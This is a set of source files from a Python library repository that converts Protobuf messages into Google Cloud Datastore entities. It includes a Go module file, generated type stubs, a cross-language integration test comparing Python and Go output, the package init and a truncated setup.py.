Kami/python-protobuf-cloud-datastore-entity-translator
https://github.com/Kami/python-protobuf-cloud-datastore-entity-translator
bba77af0681a9a80707d58e261d8af5c7d7ccaa9
f1f6d5b1c2aac7f7c7aa949f3c46dcf13b148659
3e9f690b1a01c12484c8f3cd25d3cec26e3539b6
refs/heads/master
2020-06-06T16:51:47.775050
2020-04-15T15:27:53
2020-04-15T15:27:53
192,796,928
3
0
Apache-2.0
2019-06-19T20:03:36
2019-09-24T16:39:19
2019-09-25T11:25:03
Python
[ { "alpha_fraction": 0.6601941585540771, "alphanum_fraction": 0.8090614676475525, "avg_line_length": 46.53845977783203, "blob_id": "534dea2178f23431e86ac0458a3df9131b9cbef2", "content_id": "afe61e461d9e23a2d2012aad623ef0b5b8eda361", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 618, "license_type": "permissive", "max_line_length": 132, "num_lines": 13, "path": "/tests/integration/go/go.mod", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "module github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/integration/go\n\ngo 1.12\n\nrequire (\n\tcloud.google.com/go v0.43.0 // indirect\n\tgithub.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go v0.0.0-00010101000000-000000000000 // indirect\n\tgithub.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator v0.0.0-20190716120802-c2a422e5787b\n)\n\nreplace cloud.google.com/go => github.com/Sheshagiri/google-cloud-go v0.41.1-0.20190711043959-301311007500\n\nreplace github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go => ../../generated/go\n" }, { "alpha_fraction": 0.6398038864135742, "alphanum_fraction": 0.6479524970054626, "avg_line_length": 51.850364685058594, "blob_id": "35bef6e3cf1d6913bd087946033b95d3da560c58", "content_id": "c06135d729c964298d88b8da40d00dc5390c761b", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14481, "license_type": "permissive", "max_line_length": 691, "num_lines": 274, "path": "/tests/generated/example_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. 
Do not edit!\nimport sys\nfrom example2_pb2 import (\n ExampleReferencedType as example2_pb2___ExampleReferencedType,\n)\n\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.internal.containers import (\n RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,\n RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom google.protobuf.struct_pb2 import (\n NullValue as google___protobuf___struct_pb2___NullValue,\n Struct as google___protobuf___struct_pb2___Struct,\n)\n\nfrom google.protobuf.timestamp_pb2 import (\n Timestamp as google___protobuf___timestamp_pb2___Timestamp,\n)\n\nfrom google.type.latlng_pb2 import (\n LatLng as google___type___latlng_pb2___LatLng,\n)\n\nfrom models.example3_pb2 import (\n ExampleWithPackageDBModel as models___example3_pb2___ExampleWithPackageDBModel,\n)\n\nfrom typing import (\n Iterable as typing___Iterable,\n List as typing___List,\n Mapping as typing___Mapping,\n MutableMapping as typing___MutableMapping,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleEnumModel(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleEnumModel: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleEnumModel]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleEnumModel]]: ...\n ENUM0 = typing___cast(ExampleEnumModel, 0)\n ENUM1 = typing___cast(ExampleEnumModel, 1)\n ENUM2 = typing___cast(ExampleEnumModel, 2)\nENUM0 = typing___cast(ExampleEnumModel, 0)\nENUM1 = typing___cast(ExampleEnumModel, 1)\nENUM2 = typing___cast(ExampleEnumModel, 2)\n\nclass ExampleNestedModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n int32_key = ... # type: int\n enum_key = ... # type: ExampleEnumModel\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n enum_key : typing___Optional[ExampleEnumModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleNestedModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",u\"int32_key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",b\"enum_key\",u\"int32_key\",b\"int32_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleDBModelWithKey(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n string_key = ... # type: typing___Text\n int32_key = ... 
# type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithKey: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_key\",u\"key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_key\",b\"int32_key\",u\"key\",b\"key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n class MapStringStringEntry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: typing___Text\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel.MapStringStringEntry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n class MapStringInt32Entry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel.MapStringInt32Entry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n int32_key = ... # type: int\n string_key = ... # type: typing___Text\n bool_key = ... # type: bool\n bytes_key = ... # type: bytes\n double_key = ... # type: float\n float_key = ... # type: float\n int64_key = ... # type: int\n string_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]\n int32_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[int]\n bytes_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[bytes]\n enum_key = ... # type: ExampleEnumModel\n null_key = ... 
# type: google___protobuf___struct_pb2___NullValue\n\n @property\n def map_string_string(self) -> typing___MutableMapping[typing___Text, typing___Text]: ...\n\n @property\n def map_string_int32(self) -> typing___MutableMapping[typing___Text, int]: ...\n\n @property\n def complex_array_key(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[ExampleNestedModel]: ...\n\n @property\n def struct_array_key(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[google___protobuf___struct_pb2___Struct]: ...\n\n @property\n def timestamp_key(self) -> google___protobuf___timestamp_pb2___Timestamp: ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n @property\n def geo_point_key(self) -> google___type___latlng_pb2___LatLng: ...\n\n def __init__(self,\n *,\n int32_key : typing___Optional[int] = None,\n string_key : typing___Optional[typing___Text] = None,\n bool_key : typing___Optional[bool] = None,\n bytes_key : typing___Optional[bytes] = None,\n double_key : typing___Optional[float] = None,\n float_key : typing___Optional[float] = None,\n int64_key : typing___Optional[int] = None,\n map_string_string : typing___Optional[typing___Mapping[typing___Text, typing___Text]] = None,\n map_string_int32 : typing___Optional[typing___Mapping[typing___Text, int]] = None,\n string_array_key : typing___Optional[typing___Iterable[typing___Text]] = None,\n int32_array_key : typing___Optional[typing___Iterable[int]] = None,\n bytes_array_key : typing___Optional[typing___Iterable[bytes]] = None,\n complex_array_key : typing___Optional[typing___Iterable[ExampleNestedModel]] = None,\n struct_array_key : typing___Optional[typing___Iterable[google___protobuf___struct_pb2___Struct]] = None,\n enum_key : typing___Optional[ExampleEnumModel] = None,\n timestamp_key : typing___Optional[google___protobuf___timestamp_pb2___Timestamp] = None,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n null_key : typing___Optional[google___protobuf___struct_pb2___NullValue] = None,\n geo_point_key : typing___Optional[google___type___latlng_pb2___LatLng] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"geo_point_key\",u\"struct_key\",u\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",u\"bytes_array_key\",u\"bytes_key\",u\"complex_array_key\",u\"double_key\",u\"enum_key\",u\"float_key\",u\"geo_point_key\",u\"int32_array_key\",u\"int32_key\",u\"int64_key\",u\"map_string_int32\",u\"map_string_string\",u\"null_key\",u\"string_array_key\",u\"string_key\",u\"struct_array_key\",u\"struct_key\",u\"timestamp_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"geo_point_key\",b\"geo_point_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: 
typing_extensions___Literal[u\"bool_key\",b\"bool_key\",u\"bytes_array_key\",b\"bytes_array_key\",u\"bytes_key\",b\"bytes_key\",u\"complex_array_key\",b\"complex_array_key\",u\"double_key\",b\"double_key\",u\"enum_key\",b\"enum_key\",u\"float_key\",b\"float_key\",u\"geo_point_key\",b\"geo_point_key\",u\"int32_array_key\",b\"int32_array_key\",u\"int32_key\",b\"int32_key\",u\"int64_key\",b\"int64_key\",u\"map_string_int32\",b\"map_string_int32\",u\"map_string_string\",b\"map_string_string\",u\"null_key\",b\"null_key\",u\"string_array_key\",b\"string_array_key\",u\"string_key\",b\"string_key\",u\"struct_array_key\",b\"struct_array_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> None: ...\n\nclass ExampleWithReferencedTypeDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n referenced_enum = ... # type: ExampleEnumModel\n\n @property\n def referenced_type_key(self) -> example2_pb2___ExampleReferencedType: ...\n\n @property\n def referenced_package_type_key(self) -> models___example3_pb2___ExampleWithPackageDBModel: ...\n\n @property\n def referenced_struct_key(self) -> ExampleWithNestedStructDBModel: ...\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n referenced_enum : typing___Optional[ExampleEnumModel] = None,\n referenced_type_key : typing___Optional[example2_pb2___ExampleReferencedType] = None,\n referenced_package_type_key : typing___Optional[models___example3_pb2___ExampleWithPackageDBModel] = None,\n referenced_struct_key : typing___Optional[ExampleWithNestedStructDBModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleWithReferencedTypeDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"referenced_package_type_key\",u\"referenced_struct_key\",u\"referenced_type_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"referenced_enum\",u\"referenced_package_type_key\",u\"referenced_struct_key\",u\"referenced_type_key\",u\"string_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"referenced_package_type_key\",b\"referenced_package_type_key\",u\"referenced_struct_key\",b\"referenced_struct_key\",u\"referenced_type_key\",b\"referenced_type_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"referenced_enum\",b\"referenced_enum\",u\"referenced_package_type_key\",b\"referenced_package_type_key\",u\"referenced_struct_key\",b\"referenced_struct_key\",u\"referenced_type_key\",b\"referenced_type_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleWithNestedStructDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n def __init__(self,\n *,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleWithNestedStructDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if 
sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"struct_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\"]) -> None: ...\n" }, { "alpha_fraction": 0.6423550248146057, "alphanum_fraction": 0.6524604558944702, "avg_line_length": 36.31147384643555, "blob_id": "ec72f50993def27f0cbcb3f5708854c0d970de69", "content_id": "e494b370fad53d52dcb3e532b3563d09e201c6aa", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2276, "license_type": "permissive", "max_line_length": 119, "num_lines": 61, "path": "/tests/generated/example2_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom typing import (\n List as typing___List,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleReferencedEnum(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleReferencedEnum: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleReferencedEnum]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleReferencedEnum]]: ...\n KEY0 = typing___cast(ExampleReferencedEnum, 0)\n KEY1 = typing___cast(ExampleReferencedEnum, 1)\n KEY2 = typing___cast(ExampleReferencedEnum, 2)\nKEY0 = typing___cast(ExampleReferencedEnum, 0)\nKEY1 = typing___cast(ExampleReferencedEnum, 1)\nKEY2 = typing___cast(ExampleReferencedEnum, 2)\n\nclass ExampleReferencedType(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key_1 = ... # type: typing___Text\n key_2 = ... 
# type: typing___Text\n\n def __init__(self,\n *,\n key_1 : typing___Optional[typing___Text] = None,\n key_2 : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleReferencedType: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key_1\",u\"key_2\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key_1\",b\"key_1\",u\"key_2\",b\"key_2\"]) -> None: ...\n" }, { "alpha_fraction": 0.7377049326896667, "alphanum_fraction": 0.7377049326896667, "avg_line_length": 29.5, "blob_id": "8d0fa9baa533dcbffa00877ce8fbefc66c764757", "content_id": "9366fd7842022cf8492917a2cfa91fccf413fe4d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 81, "num_lines": 12, "path": "/tests/generated/models/options_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n FieldDescriptor as google___protobuf___descriptor___FieldDescriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\n\nexclude_from_index = ... # type: google___protobuf___descriptor___FieldDescriptor\n" }, { "alpha_fraction": 0.6163157224655151, "alphanum_fraction": 0.6185852885246277, "avg_line_length": 36.94736862182617, "blob_id": "819451bc2546d609a931a56e15e2413670b911ef", "content_id": "fbb560aa3f17c2abe52cc8f200f2f6b800687adb", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7931, "license_type": "permissive", "max_line_length": 97, "num_lines": 209, "path": "/tests/integration/test_cross_lang_compatibility.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Dict\n\nimport os\nimport sys\nimport json\nimport uuid\nimport subprocess\n\nfrom tests.integration.base import BaseDatastoreIntegrationTestCase\n\n__all__ = [\n 'CrossLangCompatibilityIntegrationTestCase'\n]\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nFIXTURES_PATH = os.path.join(BASE_DIR, 'fixtures/')\n\nPYTHON_INSERT_GET_SCRIPT_PATH = os.path.join(BASE_DIR, 'python/python-put-get-db-model.py')\nGO_INSERT_GET_SCRIPT_PATH = os.path.join(BASE_DIR, 'go', 'go-put-get-db-model')\n\nGO_BINARY_DOESNT_EXIST_ERROR = \"\"\"\ngo-put-get-db-model binary doesn't exist. 
You can build it by running\n./scripts/build-go-binary.sh script.\n\"\"\".strip()\n\n\nclass CrossLangCompatibilityIntegrationTestCase(BaseDatastoreIntegrationTestCase):\n \"\"\"\n Integration test which verifies that the output by Python and Go translator\n library is exactly the same.\n \"\"\"\n\n maxDiff = None\n\n FIXTURES = [\n {\n 'path': os.path.join(FIXTURES_PATH, 'example_db_model_1.json'),\n 'key': str(uuid.uuid4()),\n 'entity_kind': 'ExampleCompatDBModel'\n }\n ]\n\n def setUp(self):\n # type: () -> None\n super(CrossLangCompatibilityIntegrationTestCase, self).setUp()\n\n # Verify go binary exists\n if not os.path.isfile(GO_INSERT_GET_SCRIPT_PATH):\n raise ValueError(GO_BINARY_DOESNT_EXIST_ERROR)\n\n # Load fixture content into memory\n for fixture_obj in self.FIXTURES:\n with open(fixture_obj['path'], 'r') as fp:\n fixture_obj['content'] = json.loads(fp.read())\n\n def test_put_and_get(self):\n # type: () -> None\n for fixture_obj in self.FIXTURES:\n self._test_fixture_obj(fixture_obj=fixture_obj)\n\n def _test_fixture_obj(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n\n # Insert Protobuf model in the datastore using Python translator library\n self._python_insert_fixture(fixture_obj=fixture_obj)\n\n # Insert Protobuf model in the datastore using Go translator library\n self._go_insert_fixture(fixture_obj=fixture_obj)\n\n # Verify entity has been inserted\n key_python = self.client.key(fixture_obj['entity_kind'], 'python_' + fixture_obj['key'])\n key_go = self.client.key(fixture_obj['entity_kind'], 'go_' + fixture_obj['key'])\n\n entity_python_pb = self.client.get(key_python)\n entity_go_pb = self.client.get(key_go)\n\n self.assertTrue(entity_python_pb, 'Entity with key \"%s\" not found' % (key_python))\n self.assertTrue(entity_go_pb, 'Entity with key \"%s\" not found' % (key_go))\n\n # Reset keys since they will always be different\n entity_python_pb.key = None\n entity_go_pb.key = None\n\n # Compare the raw entity result\n msg = 'Translated Entity PB objects for Python and Go don\\'t match'\n self.assertEqual(entity_python_pb, entity_go_pb, msg)\n\n # Compare translated models\n\n # First perform a sanity test and make sure it matches the original fixture input\n model_pb_json_python = self._python_get_fixture(fixture_obj=fixture_obj)\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_python,\n fixture_obj['content'])\n\n model_pb_json_go = self._go_get_fixture(fixture_obj=fixture_obj)\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_go, fixture_obj['content'])\n\n # Now compare Python and Go versions and make sure they match\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_python, model_pb_json_go)\n\n def assertDictsEqualIgnoreMissingDefaultValues(self, model_pb_python, model_pb_go):\n \"\"\"\n Custom assertion function which asserts that the provided Model PB returned by the Python\n translator library and the one returned by the Go one serialized as JSON are the same.\n\n NOTE: We need a custom assert functions because there are some differences between JSON\n <-> PB serialized in Python and Go and we use JSON as an intermediate format for our test\n fixtures.\n \"\"\"\n field_names = set(model_pb_python.keys())\n field_names.update(model_pb_go.keys())\n\n for field_name in field_names:\n # NOTE: Due to the JSON serializer differences there can be some default values\n # missing\n value_python = model_pb_python.get(field_name, None)\n value_go = model_pb_go.get(field_name, None)\n\n if not value_python and not 
value_go:\n value_python = None\n value_go = None\n\n msg = 'Field \"%s\" on Python and Go Model PB object didn\\'t match' % (field_name)\n self.assertEqual(value_python, value_go, msg)\n\n def _python_insert_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n args = [\n sys.executable,\n PYTHON_INSERT_GET_SCRIPT_PATH,\n '--operation=put',\n '--fixture-path=%s' % (fixture_obj['path']),\n '--primary-key=python_%s' % (fixture_obj['key']),\n ]\n\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n def _go_insert_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n args = [\n GO_INSERT_GET_SCRIPT_PATH,\n '-operation=put',\n '-fixture-path=%s' % (fixture_obj['path']),\n '-primary-key=go_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n def _python_get_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> Dict\n args = [\n sys.executable,\n PYTHON_INSERT_GET_SCRIPT_PATH,\n '--operation=get',\n '--primary-key=python_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n json_parsed = json.loads(stdout) # type: ignore\n\n return json_parsed\n\n def _go_get_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> Dict\n args = [\n GO_INSERT_GET_SCRIPT_PATH,\n '-operation=get',\n '-primary-key=go_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n json_parsed = json.loads(stdout)\n\n return json_parsed\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7347593307495117, "avg_line_length": 32.39285659790039, "blob_id": "2e80981caee4dc954f662cfd806fb7a576379338", "content_id": "4952a1cea48caa8c16293c7e514f8af73a96b24d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/protobuf_cloud_datastore_translator/__init__.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\n\n__all__ = [\n 'model_pb_to_entity_pb',\n 
'model_pb_with_key_to_entity_pb',\n 'entity_pb_to_model_pb'\n]\n\n__version__ = '0.1.14-dev'\n\nfrom .translator import model_pb_to_entity_pb\nfrom .translator import model_pb_with_key_to_entity_pb\nfrom .translator import entity_pb_to_model_pb\n" }, { "alpha_fraction": 0.6818554997444153, "alphanum_fraction": 0.697044312953949, "avg_line_length": 33.79999923706055, "blob_id": "6e9cf39f03c2c758ca8e79ad5e89904ac80401ac", "content_id": "ce9f5a9886b530c428cb046ba3810828f008af47", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2436, "license_type": "permissive", "max_line_length": 88, "num_lines": 70, "path": "/setup.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport codecs\nimport sys\nimport os.path\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nfrom dist_utils import fetch_requirements\nfrom dist_utils import parse_version_string\n\nPY2 = sys.version_info[0] == 2\nPY2_or_3_pre_34 = sys.version_info < (3, 4, 0)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nREQUIREMENTS_FILE = os.path.join(BASE_DIR, 'requirements.txt')\nINIT_FILE = os.path.join(BASE_DIR, 'protobuf_cloud_datastore_translator', '__init__.py')\n\nversion = parse_version_string(INIT_FILE)\ninstall_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)\n\nif PY2_or_3_pre_34:\n install_reqs.append('typing')\n\nwith codecs.open(os.path.join(BASE_DIR, 'README.md'), encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name='protobuf-cloud-datastore-translator',\n version=version,\n description=('Library which converts arbitrary Protobuf message objects into '\n 'Entity Protobuf objects which can be used with Google Datastore.'),\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n author='Tomaz Muraus',\n author_email='tomaz@tomaz.me',\n license='Apache License (2.0)',\n classifiers=[\n 'Intended Audience :: Information Technology',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 